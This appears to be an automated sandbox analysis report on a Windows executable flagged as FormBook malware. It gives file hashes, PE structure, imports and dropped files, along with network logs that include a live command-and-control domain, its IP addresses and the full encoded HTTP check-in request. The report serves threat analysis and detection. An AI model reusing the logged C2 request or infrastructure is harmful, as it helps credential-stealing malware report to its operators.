Preview:	}..OY2E0@VE6..DZ.T0AG0K2.Z2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT.AG0E-.T2.9.w.7..e.?=Ca7B$U=;_eS%8+Y$z&?w&E/gY%...ae]+2 .]WN~WT0AG0KKNS.xP#.xV7.y:0.*...qR(.(.j%Q.@..hP&.b"Q'gR".DVE6PZDZ..0A.1J2..b.0DVE6PZD.WV1JF;K2.^2E0DVE6PZ.NWT0QG0KRKZ2EpDVU6PZFZWR0AG0K2O\2E0DVE6P:@ZWV0AG0K2MZr.0DFE6@ZDZWD0AW0K2OZ2U0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6~.!"#T0A..O2OJ2E0.RE6@ZDZWT0AG0K2OZ2e0D6E6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6P

C:\Users\user\AppData\Local\Temp\X0a-0531

Download File

Process:	C:\Windows\SysWOW64\xwizard.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut83CF.tmp

Download File

Process:	C:\Users\user\Desktop\6SN0DJ38zZ.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.993766009454213
Encrypted:	true
SSDEEP:	6144:6C+fRuxSJlsJ21eOGekDZhjvJAJ/JJAL19op8/TLh2AJ9trtg:U5sROGekHzJA3yvCwTLhjJ9Xg
MD5:	F8F104B847CE08C8D2DE8DE58CCBE942
SHA1:	A74D19F99A4A1A196BE0F5BFBCE5F6FC153FAC30
SHA-256:	431F60B2EB8C660E1224D2BE82EB3CBFAE4F7B824FE7B2A44DFA67C9D2EEC2A2
SHA-512:	CA2787E5199B713E27F5716FFFF70D12433C71EAF60A275415CB9AF90143A6F331DE5D2C1AF3A1158167B6719E5B103D4A085C447199D9C0E76B834D47454CD3
Malicious:	false
Preview:	}..OY2E0@VE6..DZ.T0AG0K2.Z2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT.AG0E-.T2.9.w.7..e.?=Ca7B$U=;_eS%8+Y$z&?w&E/gY%...ae]+2 .]WN~WT0AG0KKNS.xP#.xV7.y:0.*...qR(.(.j%Q.@..hP&.b"Q'gR".DVE6PZDZ..0A.1J2..b.0DVE6PZD.WV1JF;K2.^2E0DVE6PZ.NWT0QG0KRKZ2EpDVU6PZFZWR0AG0K2O\2E0DVE6P:@ZWV0AG0K2MZr.0DFE6@ZDZWD0AW0K2OZ2U0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6~.!"#T0A..O2OJ2E0.RE6@ZDZWT0AG0K2OZ2e0D6E6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6P

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.183060015241189
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6SN0DJ38zZ.exe
File size:	1'201'665 bytes
MD5:	c0c3a82789a704a5ed3e165d9c61da76
SHA1:	5e36e1c449a25ddff1d10100e2ae205633334aad
SHA256:	f56bfc8fdaa505f1fedd6aab5e27bc739d5c92a93c315dece4113ea40bd9bc8b
SHA512:	a6c938a8fb440ea808dd4348e6d392f4a60a94d8988f4e8b5a11f01302ec71657365f330e03f3594bae2fbd7d27b6eb905fa7c3fc2e5d6f7f2a4856c8ffbdcea
SSDEEP:	24576:qu6J33O0c+JY5UZ+XC0kGso6FaHH0gQCb3igteIOtOZNFcWY:cu0c++OCvkGs9FaHH0gQCDtvOt+Y
TLSH:	AD45CF2273DDC360CB669173BF69B7016EBF7C614630B85B2F880D7DA950162162DBA3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675AE4F9 [Thu Dec 12 13:28:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F5558EB2BFAh
jmp 00007F5558EA59C4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F5558EA5B4Ah
cmp edi, eax
jc 00007F5558EA5EAEh
bt dword ptr [004C31FCh], 01h
jnc 00007F5558EA5B49h
rep movsb
jmp 00007F5558EA5E5Ch
cmp ecx, 00000080h
jc 00007F5558EA5D14h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F5558EA5B50h
bt dword ptr [004BE324h], 01h
jc 00007F5558EA6020h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F5558EA5CEDh
test edi, 00000003h
jne 00007F5558EA5CFEh
test esi, 00000003h
jne 00007F5558EA5CDDh
bt edi, 02h
jnc 00007F5558EA5B4Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F5558EA5B53h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F5558EA5BA5h
bt esi, 03h
jnc 00007F5558EA5BF8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x5cc58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x124000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x5cc58	0x5ce00	a8c720a710d1263dc396eea8c91f9907	False	0.9287359101615074	data	7.897398953683963	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x124000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x53f1d	data			1.0003228273862323
RT_GROUP_ICON	0x1236d8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x123750	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x123764	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x123778	0x14	data	English	Great Britain	1.25
RT_VERSION	0x12378c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x123868	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T13:39:19.556542+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49805	103.23.149.28	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 13:39:17.775012970 CET	49805	80	192.168.2.7	103.23.149.28
Dec 13, 2024 13:39:17.979938030 CET	80	49805	103.23.149.28	192.168.2.7
Dec 13, 2024 13:39:17.980065107 CET	49805	80	192.168.2.7	103.23.149.28
Dec 13, 2024 13:39:17.991413116 CET	49805	80	192.168.2.7	103.23.149.28
Dec 13, 2024 13:39:18.111252069 CET	80	49805	103.23.149.28	192.168.2.7
Dec 13, 2024 13:39:19.556413889 CET	80	49805	103.23.149.28	192.168.2.7
Dec 13, 2024 13:39:19.556468964 CET	80	49805	103.23.149.28	192.168.2.7
Dec 13, 2024 13:39:19.556541920 CET	49805	80	192.168.2.7	103.23.149.28
Dec 13, 2024 13:39:19.566781998 CET	49805	80	192.168.2.7	103.23.149.28
Dec 13, 2024 13:39:19.686492920 CET	80	49805	103.23.149.28	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 13:39:16.687256098 CET	58506	53	192.168.2.7	1.1.1.1
Dec 13, 2024 13:39:17.678451061 CET	58506	53	192.168.2.7	1.1.1.1
Dec 13, 2024 13:39:17.740061045 CET	53	58506	1.1.1.1	192.168.2.7
Dec 13, 2024 13:39:17.979918957 CET	53	58506	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 13:39:16.687256098 CET	192.168.2.7	1.1.1.1	0x49e9	Standard query (0)	www.y6h6kn.top	A (IP address)	IN (0x0001)	false
Dec 13, 2024 13:39:17.678451061 CET	192.168.2.7	1.1.1.1	0x49e9	Standard query (0)	www.y6h6kn.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 13:39:17.740061045 CET	1.1.1.1	192.168.2.7	0x49e9	No error (0)	www.y6h6kn.top	103.23.149.28	A (IP address)	IN (0x0001)	false
Dec 13, 2024 13:39:17.740061045 CET	1.1.1.1	192.168.2.7	0x49e9	No error (0)	www.y6h6kn.top	162.251.95.62	A (IP address)	IN (0x0001)	false
Dec 13, 2024 13:39:17.979918957 CET	1.1.1.1	192.168.2.7	0x49e9	No error (0)	www.y6h6kn.top	103.23.149.28	A (IP address)	IN (0x0001)	false
Dec 13, 2024 13:39:17.979918957 CET	1.1.1.1	192.168.2.7	0x49e9	No error (0)	www.y6h6kn.top	162.251.95.62	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.y6h6kn.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49805	103.23.149.28	80	524	C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 13:39:17.991413116 CET	458	OUT	GET /jv64/?9XzpA=vNkxGXa&CfV=0rgj4Y9sgnjazUN/65XyfxBpTrrNkBjNZTVEPCZk5UU8x8xERo30l5WFjW3xVEpqAaMpb+WWzoUct0TX0HY75fQ4vaKwo5APNhg+4dJ1BHUS+Ec5quFNf0FyqqAWs9oIcQLGwWPPCUJQ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.y6h6kn.top User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
